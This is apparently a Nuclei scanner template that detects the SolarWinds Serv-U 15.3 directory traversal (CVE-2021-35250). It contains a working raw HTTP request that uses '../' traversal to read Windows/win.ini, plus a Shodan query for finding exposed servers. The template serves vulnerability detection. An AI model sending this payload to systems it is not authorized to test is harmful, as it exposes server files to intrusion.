id: CVE-2021-35250 info: name: SolarWinds Serv-U 15.3 - Directory Traversal author: johnk3r,pdteam severity: high description: | SolarWinds Serv-U 15.3 is susceptible to local file inclusion, which may allow an attacker access to installation and server files and also make it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. remediation: Resolved in Serv-U 15.3 Hotfix 1. reference: - https://github.com/rissor41/SolarWinds-CVE-2021-35250 - https://support.solarwinds.com/SuccessCenter/s/article/Serv-U-15-3-HotFix-1?language=en_US - https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35250 - https://twitter.com/shaybt12/status/1646966578695622662?s=43&t=5HOgSFut7Y75N7CBHEikSg - https://nvd.nist.gov/vuln/detail/CVE-2021-35250 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-35250 cwe-id: CWE-22 epss-score: 0.05691 epss-percentile: 0.92511 cpe: cpe:2.3:a:solarwinds:serv-u:15.3:-:*:*:*:*:*:* metadata: max-request: 1 vendor: solarwinds product: serv-u shodan-query: product:"Rhinosoft Serv-U httpd" tags: cve,cve2021,solarwinds,traversal http: - raw: - | POST /?Command=NOOP&InternalFile=../../../../../../../../../../../../../../Windows/win.ini&NewWebClient=1 HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded /?Command=NOOP matchers-condition: and matchers: - type: regex part: body regex: - "\\[(font|extension|file)s\\]" - type: status status: - 401 # digest: 4b0a00483046022100c6d900b34e88356ac754c0a86e8397f9c32671af0a69983de2e241c5f270d4e8022100973b65f70111346c38c6eb27e942ea9f38650e05cf4df3f37fbb013f2ad6d430:922c64590222798bb761d5b6d8e72950